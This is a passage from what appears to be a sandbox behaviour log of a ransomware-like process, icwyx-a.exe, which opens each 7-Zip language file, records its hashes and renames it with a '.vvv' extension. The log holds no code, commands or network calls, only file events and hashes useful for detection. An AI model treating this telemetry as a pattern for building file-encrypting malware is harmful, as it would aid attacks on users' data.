  5125. C:\Program Files\7-Zip\Lang\fy.txt
  5126.  MD5:  aff8b6889005862e1cc060b1be074d00
  5127.  SHA1: e4c2e36d7e6b26dae1e0c7e5e0d6af1edce94f72
  5128.     328     12894
  5129. File   
  5130. Rename
  5131.    
  5132. Old Name:   C:\Program Files\7-Zip\Lang\fy.txt
  5133. New Name:   C:\Program Files\7-Zip\Lang\fy.txt.vvv
  5134.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5135.  MD5:  aff8b6889005862e1cc060b1be074d00
  5136.  SHA1: e4c2e36d7e6b26dae1e0c7e5e0d6af1edce94f72
  5137.     328     12894
  5138. File   
  5139. Open
  5140.    
  5141. C:\Program Files\7-Zip\Lang\gl.txt
  5142.     328     10590
  5143. File   
  5144. Close
  5145.    
  5146. C:\Program Files\7-Zip\Lang\gl.txt
  5147.  MD5:  548b92922cb0327fa6703290fb7e7fee
  5148.  SHA1: dfc3c830d1b74bf4275017449fd4f1e1f2aa281a
  5149.     328     11006
  5150. File   
  5151. Rename
  5152.    
  5153. Old Name:   C:\Program Files\7-Zip\Lang\gl.txt
  5154. New Name:   C:\Program Files\7-Zip\Lang\gl.txt.vvv
  5155.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5156.  MD5:  548b92922cb0327fa6703290fb7e7fee
  5157.  SHA1: dfc3c830d1b74bf4275017449fd4f1e1f2aa281a
  5158.     328     11006
  5159. File   
  5160. Open
  5161.    
  5162. C:\Program Files\7-Zip\Lang\gu.txt
  5163.     328     26704
  5164. File   
  5165. Close
  5166.    
  5167. C:\Program Files\7-Zip\Lang\gu.txt
  5168.  MD5:  94e7c58205246ef3f071a7b8d6cf0349
  5169.  SHA1: 716a81d7d5de1b7c94deabd4369287bc2eb0ec61
  5170.     328     27134
  5171. File   
  5172. Rename
  5173.    
  5174. Old Name:   C:\Program Files\7-Zip\Lang\gu.txt
  5175. New Name:   C:\Program Files\7-Zip\Lang\gu.txt.vvv
  5176.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5177.  MD5:  94e7c58205246ef3f071a7b8d6cf0349
  5178.  SHA1: 716a81d7d5de1b7c94deabd4369287bc2eb0ec61
  5179.     328     27134
  5180. File   
  5181. Open
  5182.    
  5183. C:\Program Files\7-Zip\Lang\he.txt
  5184.     328     16419
  5185. File   
  5186. Close
  5187.    
  5188. C:\Program Files\7-Zip\Lang\he.txt
  5189.  MD5:  defcdbaf7be4fcb29e0108f7d7715e7b
  5190.  SHA1: 3994fcb792d8f17e0ca09d0cd8ab6076c1b0c0af
  5191.     328     16846
  5192. File   
  5193. Rename
  5194.    
  5195. Old Name:   C:\Program Files\7-Zip\Lang\he.txt
  5196. New Name:   C:\Program Files\7-Zip\Lang\he.txt.vvv
  5197.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5198.  MD5:  defcdbaf7be4fcb29e0108f7d7715e7b
  5199.  SHA1: 3994fcb792d8f17e0ca09d0cd8ab6076c1b0c0af
  5200.     328     16846
  5201. File   
  5202. Open
  5203.    
  5204. C:\Program Files\7-Zip\Lang\hi.txt
  5205.     328     26795
  5206. File   
  5207. Close
  5208.    
  5209. C:\Program Files\7-Zip\Lang\hi.txt
  5210.  MD5:  7a7635f7fee901bedb15a18ef4ce07a3
  5211.  SHA1: 68bf1907fb0f469ef845453ef104c4c4efb38568
  5212.     328     27214
  5213. File   
  5214. Rename
  5215.    
  5216. Old Name:   C:\Program Files\7-Zip\Lang\hi.txt
  5217. New Name:   C:\Program Files\7-Zip\Lang\hi.txt.vvv
  5218.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5219.  MD5:  7a7635f7fee901bedb15a18ef4ce07a3
  5220.  SHA1: 68bf1907fb0f469ef845453ef104c4c4efb38568
  5221.     328     27214
  5222. File   
  5223. Open
  5224.    
  5225. C:\Program Files\7-Zip\Lang\hr.txt
  5226.     328     13506
  5227. File   
  5228. Close
  5229.    
  5230. C:\Program Files\7-Zip\Lang\hr.txt
  5231.  MD5:  ec31679ad1ebdd0c9689f2589bd56eac
  5232.  SHA1: 92f062b7bcc0b4d5f6f8e76e4d44d8a8f68ccc9c
  5233.     328     13934
  5234. File   
  5235. Rename
  5236.    
  5237. Old Name:   C:\Program Files\7-Zip\Lang\hr.txt
  5238. New Name:   C:\Program Files\7-Zip\Lang\hr.txt.vvv
  5239.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5240.  MD5:  ec31679ad1ebdd0c9689f2589bd56eac
  5241.  SHA1: 92f062b7bcc0b4d5f6f8e76e4d44d8a8f68ccc9c
  5242.     328     13934
  5243. File   
  5244. Open
  5245.    
  5246. C:\Program Files\7-Zip\Lang\hu.txt
  5247.     328     14584
  5248. File   
  5249. Close
  5250.    
  5251. C:\Program Files\7-Zip\Lang\hu.txt
  5252.  MD5:  00ac34924d2877358d658acb95837314
  5253.  SHA1: 1aa7394d339e6eb7522bd21e0a2dfe06f1fec085
  5254.     328     15006
  5255. File   
  5256. Rename
  5257.    
  5258. Old Name:   C:\Program Files\7-Zip\Lang\hu.txt
  5259. New Name:   C:\Program Files\7-Zip\Lang\hu.txt.vvv
  5260.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5261.  MD5:  00ac34924d2877358d658acb95837314
  5262.  SHA1: 1aa7394d339e6eb7522bd21e0a2dfe06f1fec085
  5263.     328     15006
  5264. File   
  5265. Open
  5266.    
  5267. C:\Program Files\7-Zip\Lang\hy.txt
  5268.     328     18716
  5269. File   
  5270. Close
  5271.    
  5272. C:\Program Files\7-Zip\Lang\hy.txt
  5273.  MD5:  d4e8bcaddf5a7d9a9c67eeb041392f76
  5274.  SHA1: 950482eeb078163b8a499bc4ae3f082f20ca9f9a
  5275.     328     19134
  5276. File   
  5277. Rename
  5278.    
  5279. Old Name:   C:\Program Files\7-Zip\Lang\hy.txt
  5280. New Name:   C:\Program Files\7-Zip\Lang\hy.txt.vvv
  5281.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5282.  MD5:  d4e8bcaddf5a7d9a9c67eeb041392f76
  5283.  SHA1: 950482eeb078163b8a499bc4ae3f082f20ca9f9a
  5284.     328     19134
  5285. File   
  5286. Open
  5287.    
  5288. C:\Program Files\7-Zip\Lang\id.txt
  5289.     328     13337
  5290. File   
  5291. Close
  5292.    
  5293. C:\Program Files\7-Zip\Lang\id.txt
  5294.  MD5:  57a51f4be45495b02530a60d8e3545ff
  5295.  SHA1: d6f5a8643c6f849c2496e2a5cb0fef8c2fe67975
  5296.     328     13758
  5297. File   
  5298. Rename
  5299.    
  5300. Old Name:   C:\Program Files\7-Zip\Lang\id.txt
  5301. New Name:   C:\Program Files\7-Zip\Lang\id.txt.vvv
  5302.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5303.  MD5:  57a51f4be45495b02530a60d8e3545ff
  5304.  SHA1: d6f5a8643c6f849c2496e2a5cb0fef8c2fe67975
  5305.     328     13758
  5306. File   
  5307. Open
  5308.    
  5309. C:\Program Files\7-Zip\Lang\io.txt
  5310.     328     10115
  5311. File   
  5312. Close
  5313.    
  5314. C:\Program Files\7-Zip\Lang\io.txt
  5315.  MD5:  8d7e3398097ba156bd872fde877923ae
  5316.  SHA1: 6eae0e44d9513f99fe5c56b38406942ff2371034
  5317.     328     10542
  5318. File   
  5319. Rename
  5320.    
  5321. Old Name:   C:\Program Files\7-Zip\Lang\io.txt
  5322. New Name:   C:\Program Files\7-Zip\Lang\io.txt.vvv
  5323.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5324.  MD5:  8d7e3398097ba156bd872fde877923ae
  5325.  SHA1: 6eae0e44d9513f99fe5c56b38406942ff2371034
  5326.     328     10542
  5327. File   
  5328. Open
  5329.    
  5330. C:\Program Files\7-Zip\Lang\is.txt
  5331.     328     12293
  5332. File   
  5333. Close
  5334.    
  5335. C:\Program Files\7-Zip\Lang\is.txt
  5336.  MD5:  725b2a12fa619a2c1e19b507937cddf8
  5337.  SHA1: 477eaa1eab5c053a3505f01b80e8201f79d2287a
  5338.     328     12718
  5339. File   
  5340. Rename
  5341.    
  5342. Old Name:   C:\Program Files\7-Zip\Lang\is.txt
  5343. New Name:   C:\Program Files\7-Zip\Lang\is.txt.vvv
  5344.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5345.  MD5:  725b2a12fa619a2c1e19b507937cddf8
  5346.  SHA1: 477eaa1eab5c053a3505f01b80e8201f79d2287a
  5347.     328     12718
  5348. File   
  5349. Open
  5350.    
  5351. C:\Program Files\7-Zip\Lang\it.txt
  5352.     328     14153
  5353. File   
  5354. Close
  5355.    
  5356. C:\Program Files\7-Zip\Lang\it.txt
  5357.  MD5:  3937198b37294f5d50434701670402c6
  5358.  SHA1: 125c52c20a04386aab052ebda75fb2e9637ae17c
  5359.     328     14574
  5360. File   
  5361. Rename
  5362.    
  5363. Old Name:   C:\Program Files\7-Zip\Lang\it.txt
  5364. New Name:   C:\Program Files\7-Zip\Lang\it.txt.vvv
  5365.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5366.  MD5:  3937198b37294f5d50434701670402c6
  5367.  SHA1: 125c52c20a04386aab052ebda75fb2e9637ae17c
  5368.     328     14574
  5369. File   
  5370. Open
  5371.    
  5372. C:\Program Files\7-Zip\Lang\ja.txt
  5373.     328     15953
  5374. File   
  5375. Close
  5376.    
  5377. C:\Program Files\7-Zip\Lang\ja.txt
  5378.  MD5:  ec9f3c49461351271fc8af7d65a50133
  5379.  SHA1: 8a737ab4390543008869677be0cda9f4fd310279
  5380.     328     16382
  5381. File   
  5382. Rename
  5383.    
  5384. Old Name:   C:\Program Files\7-Zip\Lang\ja.txt
  5385. New Name:   C:\Program Files\7-Zip\Lang\ja.txt.vvv
  5386.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5387.  MD5:  ec9f3c49461351271fc8af7d65a50133
  5388.  SHA1: 8a737ab4390543008869677be0cda9f4fd310279
  5389.     328     16382
  5390. File   
  5391. Open
  5392.    
  5393. C:\Program Files\7-Zip\Lang\ka.txt
  5394.     328     19733
  5395. File   
  5396. Close
  5397.    
  5398. C:\Program Files\7-Zip\Lang\ka.txt
  5399.  MD5:  b3834d7955145abab12ebb97446a6c73
  5400.  SHA1: b0f79f27d4fb2a777fb380b91a131a67435c4025
  5401.     328     20158
  5402. File   
  5403. Rename
  5404.    
  5405. Old Name:   C:\Program Files\7-Zip\Lang\ka.txt
  5406. New Name:   C:\Program Files\7-Zip\Lang\ka.txt.vvv
  5407.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5408.  MD5:  b3834d7955145abab12ebb97446a6c73
  5409.  SHA1: b0f79f27d4fb2a777fb380b91a131a67435c4025
  5410.     328     20158
  5411. File   
  5412. Open
  5413.    
  5414. C:\Program Files\7-Zip\Lang\kk.txt
  5415.     328     17704
  5416. File   
  5417. Close
  5418.    
  5419. C:\Program Files\7-Zip\Lang\kk.txt
  5420.  MD5:  f1f3b8eec1f6875469e2df93af9d28b2
  5421.  SHA1: 79b947f14009ef0c06fdaa1267c1885249e8d2ab
  5422.     328     18126
  5423. File   
  5424. Rename
  5425.    
  5426. Old Name:   C:\Program Files\7-Zip\Lang\kk.txt
  5427. New Name:   C:\Program Files\7-Zip\Lang\kk.txt.vvv
  5428.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5429.  MD5:  f1f3b8eec1f6875469e2df93af9d28b2
  5430.  SHA1: 79b947f14009ef0c06fdaa1267c1885249e8d2ab
  5431.     328     18126
  5432. File   
  5433. Open
  5434.    
  5435. C:\Program Files\7-Zip\Lang\ko.txt
  5436.     328     14742
  5437. File   
  5438. Close
  5439.    
  5440. C:\Program Files\7-Zip\Lang\ko.txt
  5441.  MD5:  81aa80c3f6a82aa31302909b0c05a49f
  5442.  SHA1: eb578e3680ce3c8be71b62d8a1b199cbdd037c29
  5443.     328     15166
  5444. File   
  5445. Rename
  5446.    
  5447. Old Name:   C:\Program Files\7-Zip\Lang\ko.txt
  5448. New Name:   C:\Program Files\7-Zip\Lang\ko.txt.vvv
  5449.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5450.  MD5:  81aa80c3f6a82aa31302909b0c05a49f
  5451.  SHA1: eb578e3680ce3c8be71b62d8a1b199cbdd037c29
  5452.     328     15166
  5453. File   
  5454. Open
  5455.    
  5456. C:\Program Files\7-Zip\Lang\ku-ckb.txt
  5457.     328     19711
  5458. File   
  5459. Close
  5460.    
  5461. C:\Program Files\7-Zip\Lang\ku-ckb.txt
  5462.  MD5:  ed3f85623f4a70c4c8032da046563358
  5463.  SHA1: 7762e3bdafe7f90826b274934b4b47e2de83f37e
  5464.     328     20126
  5465. File   
  5466. Rename
  5467.    
  5468. Old Name:   C:\Program Files\7-Zip\Lang\ku-ckb.txt
  5469. New Name:   C:\Program Files\7-Zip\Lang\ku-ckb.txt.vvv
  5470.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5471.  MD5:  ed3f85623f4a70c4c8032da046563358
  5472.  SHA1: 7762e3bdafe7f90826b274934b4b47e2de83f37e
  5473.     328     20126
  5474. File   
  5475. Open
  5476.    
  5477. C:\Program Files\7-Zip\Lang\ku.txt
  5478.     328     11198
  5479. File   
  5480. Close
  5481.    
  5482. C:\Program Files\7-Zip\Lang\ku.txt
  5483.  MD5:  650d7019db102e6e1116264ddcf88e28
  5484.  SHA1: af38e3b87ebd1bab0a947a0b872bd3f55f8bdb07
  5485.     328     11614
  5486. File   
  5487. Rename
  5488.    
  5489. Old Name:   C:\Program Files\7-Zip\Lang\ku.txt
  5490. New Name:   C:\Program Files\7-Zip\Lang\ku.txt.vvv
  5491.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5492.  MD5:  650d7019db102e6e1116264ddcf88e28
  5493.  SHA1: af38e3b87ebd1bab0a947a0b872bd3f55f8bdb07
  5494.     328     11614
  5495. File   
  5496. Open
  5497.    
  5498. C:\Program Files\7-Zip\Lang\lt.txt
  5499.     328     13239
  5500. File   
  5501. Close
  5502.    
  5503. C:\Program Files\7-Zip\Lang\lt.txt
  5504.  MD5:  eef5d61bfcb1f6472a9de7ee5da85fbd
  5505.  SHA1: 714f1349bb554c2875a45f3dffb76de41bb0b507
  5506.     328     13662
  5507. File   
  5508. Rename
  5509.    
  5510. Old Name:   C:\Program Files\7-Zip\Lang\lt.txt
  5511. New Name:   C:\Program Files\7-Zip\Lang\lt.txt.vvv
  5512.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5513.  MD5:  eef5d61bfcb1f6472a9de7ee5da85fbd
  5514.  SHA1: 714f1349bb554c2875a45f3dffb76de41bb0b507
  5515.     328     13662
  5516. File   
  5517. Open
  5518.    
  5519. C:\Program Files\7-Zip\Lang\lv.txt
  5520.     328     10690
  5521. File   
  5522. Close
  5523.    
  5524. C:\Program Files\7-Zip\Lang\lv.txt
  5525.  MD5:  fe83a4672ca04694f26299501e75c769
  5526.  SHA1: ee7626a71e54c81045018db5aa53344367644b77
  5527.     328     11118
  5528. File   
  5529. Rename
  5530.    
  5531. Old Name:   C:\Program Files\7-Zip\Lang\lv.txt
  5532. New Name:   C:\Program Files\7-Zip\Lang\lv.txt.vvv
  5533.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5534.  MD5:  fe83a4672ca04694f26299501e75c769
  5535.  SHA1: ee7626a71e54c81045018db5aa53344367644b77
  5536.     328     11118
  5537. File   
  5538. Open
  5539.    
  5540. C:\Program Files\7-Zip\Lang\mk.txt
  5541.     328     15080
  5542. File   
  5543. Close
  5544.    
  5545. C:\Program Files\7-Zip\Lang\mk.txt
  5546.  MD5:  8d253e2a99e5366aade6163e64a4ebc8
  5547.  SHA1: e7b52661a0584c4504074a99c22280de29ef5126
  5548.     328     15502
  5549. File   
  5550. Rename
  5551.    
  5552. Old Name:   C:\Program Files\7-Zip\Lang\mk.txt
  5553. New Name:   C:\Program Files\7-Zip\Lang\mk.txt.vvv
  5554.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5555.  MD5:  8d253e2a99e5366aade6163e64a4ebc8
  5556.  SHA1: e7b52661a0584c4504074a99c22280de29ef5126
  5557.     328     15502
  5558. File   
  5559. Open
  5560.    
  5561. C:\Program Files\7-Zip\Lang\mn.txt
  5562.     328     14657
  5563. File   
  5564. Close
  5565.    
  5566. C:\Program Files\7-Zip\Lang\mn.txt
  5567.  MD5:  859cce0f31c8a075ead75c0843ce6552
  5568.  SHA1: c1f9f5a00b76546204f4edc657159ccca51d270e
  5569.     328     15086
  5570. File   
  5571. Rename
  5572.    
  5573. Old Name:   C:\Program Files\7-Zip\Lang\mn.txt
  5574. New Name:   C:\Program Files\7-Zip\Lang\mn.txt.vvv
  5575.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5576.  MD5:  859cce0f31c8a075ead75c0843ce6552
  5577.  SHA1: c1f9f5a00b76546204f4edc657159ccca51d270e
  5578.     328     15086
  5579. File   
  5580. Open
  5581.    
  5582. C:\Program Files\7-Zip\Lang\mr.txt
  5583.     328     17597
  5584. File   
  5585. Close
  5586.    
  5587. C:\Program Files\7-Zip\Lang\mr.txt
  5588.  MD5:  715c6b2a6b6d24d3549b3a558ac54039
  5589.  SHA1: 7a8f0bfb7b8785723a4d0974eb94ee265b3f6a9f
  5590.     328     18014
  5591. File   
  5592. Rename
  5593.    
  5594. Old Name:   C:\Program Files\7-Zip\Lang\mr.txt
  5595. New Name:   C:\Program Files\7-Zip\Lang\mr.txt.vvv
  5596.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5597.  MD5:  715c6b2a6b6d24d3549b3a558ac54039
  5598.  SHA1: 7a8f0bfb7b8785723a4d0974eb94ee265b3f6a9f
  5599.     328     18014
  5600. File   
  5601. Open
  5602.    
  5603. C:\Program Files\7-Zip\Lang\ms.txt
  5604.     328     10409
  5605. File   
  5606. Close
  5607.    
  5608. C:\Program Files\7-Zip\Lang\ms.txt
  5609.  MD5:  e7b53445783445bada3e3a7289e4f7ed
  5610.  SHA1: 135c56cc0bf5bee7f88bd0ad197cf5dba59764ea
  5611.     328     10830
  5612. File   
  5613. Rename
  5614.    
  5615. Old Name:   C:\Program Files\7-Zip\Lang\ms.txt
  5616. New Name:   C:\Program Files\7-Zip\Lang\ms.txt.vvv
  5617.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5618.  MD5:  e7b53445783445bada3e3a7289e4f7ed
  5619.  SHA1: 135c56cc0bf5bee7f88bd0ad197cf5dba59764ea
  5620.     328     10830
  5621. File   
  5622. Open
  5623.    
  5624. C:\Program Files\7-Zip\Lang\nb.txt
  5625.     328     11767
  5626. File   
  5627. Close
  5628.    
  5629. C:\Program Files\7-Zip\Lang\nb.txt
  5630.  MD5:  f4453f890e41e078e5e9bc10dcdaea52
  5631.  SHA1: 261de0bccaceec4ffbf97607999847ddd5d7a663
  5632.     328     12190
  5633. File   
  5634. Rename
  5635.    
  5636. Old Name:   C:\Program Files\7-Zip\Lang\nb.txt
  5637. New Name:   C:\Program Files\7-Zip\Lang\nb.txt.vvv
  5638.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5639.  MD5:  f4453f890e41e078e5e9bc10dcdaea52
  5640.  SHA1: 261de0bccaceec4ffbf97607999847ddd5d7a663
  5641.     328     12190
  5642. File   
  5643. Open
  5644.    
  5645. C:\Program Files\7-Zip\Lang\ne.txt
  5646.     328     21822
  5647. File   
  5648. Close
  5649.    
  5650. C:\Program Files\7-Zip\Lang\ne.txt
  5651.  MD5:  880b35da9aefd077d0893a2b34b0de90
  5652.  SHA1: 61bcd05a4e099be830b9674b0a52184df2599459
  5653.     328     22238
  5654. File   
  5655. Rename
  5656.    
  5657. Old Name:   C:\Program Files\7-Zip\Lang\ne.txt
  5658. New Name:   C:\Program Files\7-Zip\Lang\ne.txt.vvv
  5659.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5660.  MD5:  880b35da9aefd077d0893a2b34b0de90
  5661.  SHA1: 61bcd05a4e099be830b9674b0a52184df2599459
  5662.     328     22238
  5663. File   
  5664. Open
  5665.    
  5666. C:\Program Files\7-Zip\Lang\nl.txt
  5667.     328     14213
  5668. File   
  5669. Close
  5670.    
  5671. C:\Program Files\7-Zip\Lang\nl.txt
  5672.  MD5:  ecb27bed9bbd6e60e92f7e43fd66eecb
  5673.  SHA1: e375150c927eb0592cf1e694101f6e8623550a9a
  5674.     328     14638
  5675. File   
  5676. Rename
  5677.    
  5678. Old Name:   C:\Program Files\7-Zip\Lang\nl.txt
  5679. New Name:   C:\Program Files\7-Zip\Lang\nl.txt.vvv
  5680.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5681.  MD5:  ecb27bed9bbd6e60e92f7e43fd66eecb
  5682.  SHA1: e375150c927eb0592cf1e694101f6e8623550a9a
  5683.     328     14638
  5684. File   
  5685. Open
  5686.    
  5687. C:\Program Files\7-Zip\Lang\nn.txt
  5688.     328     11500
  5689. File   
  5690. Close
  5691.    
  5692. C:\Program Files\7-Zip\Lang\nn.txt
  5693.  MD5:  9b27aae1ba98fa8114115972a172c832
  5694.  SHA1: e7a8b4a79c7fbaeff7632da97d387001a1cff487
  5695.     328     11918
  5696. File   
  5697. Rename
  5698.    
  5699. Old Name:   C:\Program Files\7-Zip\Lang\nn.txt
  5700. New Name:   C:\Program Files\7-Zip\Lang\nn.txt.vvv
  5701.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5702.  MD5:  9b27aae1ba98fa8114115972a172c832
  5703.  SHA1: e7a8b4a79c7fbaeff7632da97d387001a1cff487
  5704.     328     11918
  5705. File   
  5706. Open
  5707.    
  5708. C:\Program Files\7-Zip\Lang\pa-in.txt
  5709.     328     22849
  5710. File   
  5711. Close
  5712.    
  5713. C:\Program Files\7-Zip\Lang\pa-in.txt
  5714.  MD5:  1746514f6e78d9b18aaf1eabd9674197
  5715.  SHA1: 34b03796b5152d1192f65755ff74bb0462dc5241
  5716.     328     23278
  5717. File   
  5718. Rename
  5719.    
  5720. Old Name:   C:\Program Files\7-Zip\Lang\pa-in.txt
  5721. New Name:   C:\Program Files\7-Zip\Lang\pa-in.txt.vvv
  5722.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5723.  MD5:  1746514f6e78d9b18aaf1eabd9674197
  5724.  SHA1: 34b03796b5152d1192f65755ff74bb0462dc5241
  5725.     328     23278
  5726. File   
  5727. Open
  5728.    
  5729. C:\Program Files\7-Zip\Lang\pl.txt
  5730.     328     14102
  5731. File   
  5732. Close
  5733.    
  5734. C:\Program Files\7-Zip\Lang\pl.txt
  5735.  MD5:  d3cd4e3f351a678ec61aa874f76bef36
  5736.  SHA1: 17b6eab7596148566f7c02c104be6aa98b3c9762
  5737.     328     14526
  5738. File   
  5739. Rename
  5740.    
  5741. Old Name:   C:\Program Files\7-Zip\Lang\pl.txt
  5742. New Name:   C:\Program Files\7-Zip\Lang\pl.txt.vvv
  5743.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5744.  MD5:  d3cd4e3f351a678ec61aa874f76bef36
  5745.  SHA1: 17b6eab7596148566f7c02c104be6aa98b3c9762
  5746.     328     14526
  5747. File   
  5748. Open
  5749.    
  5750. C:\Program Files\7-Zip\Lang\ps.txt
  5751.     328     15131
  5752. File   
  5753. Close
  5754.    
  5755. C:\Program Files\7-Zip\Lang\ps.txt
  5756.  MD5:  301a6645c6932c59f8e6af3fdc408e6a
  5757.  SHA1: 20c9a0a92913610f62019c8dc3df85d6274dadd5
  5758.     328     15550
  5759. File   
  5760. Rename
  5761.    
  5762. Old Name:   C:\Program Files\7-Zip\Lang\ps.txt
  5763. New Name:   C:\Program Files\7-Zip\Lang\ps.txt.vvv
  5764.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5765.  MD5:  301a6645c6932c59f8e6af3fdc408e6a
  5766.  SHA1: 20c9a0a92913610f62019c8dc3df85d6274dadd5
  5767.     328     15550
  5768. File   
  5769. Open
  5770.    
  5771. C:\Program Files\7-Zip\Lang\pt-br.txt
  5772.     328     13864
  5773. File   
  5774. Close
  5775.    
  5776. C:\Program Files\7-Zip\Lang\pt-br.txt
  5777.  MD5:  221874611cbacd205464ed53a83db9e7
  5778.  SHA1: 729abbe1099d2acf468856d2510c63b26218e0d4
  5779.     328     14286
  5780. File   
  5781. Rename
  5782.    
  5783. Old Name:   C:\Program Files\7-Zip\Lang\pt-br.txt
  5784. New Name:   C:\Program Files\7-Zip\Lang\pt-br.txt.vvv
  5785.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5786.  MD5:  221874611cbacd205464ed53a83db9e7
  5787.  SHA1: 729abbe1099d2acf468856d2510c63b26218e0d4
  5788.     328     14286
  5789. File   
  5790. Open
  5791.    
  5792. C:\Program Files\7-Zip\Lang\pt.txt
  5793.     328     14007
  5794. File   
  5795. Close
  5796.    
  5797. C:\Program Files\7-Zip\Lang\pt.txt
  5798.  MD5:  02b6ff8aa4dae4eea729b2e84cbceb7d
  5799.  SHA1: d62a614ae4c8fdef62a7a2ea62fec4fe8ab90a03
  5800.     328     14430
  5801. File   
  5802. Rename
  5803.    
  5804. Old Name:   C:\Program Files\7-Zip\Lang\pt.txt
  5805. New Name:   C:\Program Files\7-Zip\Lang\pt.txt.vvv
  5806.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5807.  MD5:  02b6ff8aa4dae4eea729b2e84cbceb7d
  5808.  SHA1: d62a614ae4c8fdef62a7a2ea62fec4fe8ab90a03
  5809.     328     14430
  5810. File   
  5811. Open
  5812.    
  5813. C:\Program Files\7-Zip\Lang\ro.txt
  5814.     328     13994
  5815. File   
  5816. Close
  5817.    
  5818. C:\Program Files\7-Zip\Lang\ro.txt
  5819.  MD5:  019852f1b33e4cfe20b35c78151cc893
  5820.  SHA1: c359e3b2c4b24c42f4d381b83092383c21a0eef2
  5821.     328     14414
  5822. File   
  5823. Rename
  5824.    
  5825. Old Name:   C:\Program Files\7-Zip\Lang\ro.txt
  5826. New Name:   C:\Program Files\7-Zip\Lang\ro.txt.vvv
  5827.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5828.  MD5:  019852f1b33e4cfe20b35c78151cc893
  5829.  SHA1: c359e3b2c4b24c42f4d381b83092383c21a0eef2
  5830.     328     14414
  5831. File   
  5832. Open
  5833.    
  5834. C:\Program Files\7-Zip\Lang\ru.txt
  5835.     328     19107
  5836. File   
  5837. Close
  5838.    
  5839. C:\Program Files\7-Zip\Lang\ru.txt
  5840.  MD5:  7a71b2a81b4475381513f79188f8b52d
  5841.  SHA1: 063147c8ddfcfcf8f757baab1c96427b97dfddba
  5842.     328     19534
  5843. File   
  5844. Rename
  5845.    
  5846. Old Name:   C:\Program Files\7-Zip\Lang\ru.txt
  5847. New Name:   C:\Program Files\7-Zip\Lang\ru.txt.vvv
  5848.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5849.  MD5:  7a71b2a81b4475381513f79188f8b52d
  5850.  SHA1: 063147c8ddfcfcf8f757baab1c96427b97dfddba
  5851.     328     19534
  5852. File   
  5853. Open
  5854.    
  5855. C:\Program Files\7-Zip\Lang\sa.txt
  5856.     328     28434
  5857. File   
  5858. Close
  5859.    
  5860. C:\Program Files\7-Zip\Lang\sa.txt
  5861.  MD5:  6f5e1bdd3e14761d8d1579b6bcc59b97
  5862.  SHA1: e18b47425da207d278f8ec27ec086a4bfb56577a
  5863.     328     28862
  5864. File   
  5865. Rename
  5866.    
  5867. Old Name:   C:\Program Files\7-Zip\Lang\sa.txt
  5868. New Name:   C:\Program Files\7-Zip\Lang\sa.txt.vvv
  5869.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5870.  MD5:  6f5e1bdd3e14761d8d1579b6bcc59b97
  5871.  SHA1: e18b47425da207d278f8ec27ec086a4bfb56577a
  5872.     328     28862
  5873. File   
  5874. Open
  5875.    
  5876. C:\Program Files\7-Zip\Lang\si.txt
  5877.     328     25126
  5878. File   
  5879. Close
  5880.    
  5881. C:\Program Files\7-Zip\Lang\si.txt
  5882.  MD5:  ce66c0e092912e3321341acc39e77f4a
  5883.  SHA1: f3b2fae989367d6d34fe6994a127a7a154fc15bd
  5884.     328     25550
  5885. File   
  5886. Rename
  5887.    
  5888. Old Name:   C:\Program Files\7-Zip\Lang\si.txt
  5889. New Name:   C:\Program Files\7-Zip\Lang\si.txt.vvv
  5890.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5891.  MD5:  ce66c0e092912e3321341acc39e77f4a
  5892.  SHA1: f3b2fae989367d6d34fe6994a127a7a154fc15bd
  5893.     328     25550
  5894. File   
  5895. Open
  5896.    
  5897. C:\Program Files\7-Zip\Lang\sk.txt
  5898.     328     14323
  5899. File   
  5900. Close
  5901.    
  5902. C:\Program Files\7-Zip\Lang\sk.txt
  5903.  MD5:  d3a53836aa67fe47659c538a95b58384
  5904.  SHA1: 0de4300e1d1f81a3799cee8abadd3c77927fb83b
  5905.     328     14750
  5906. File   
  5907. Rename
  5908.    
  5909. Old Name:   C:\Program Files\7-Zip\Lang\sk.txt
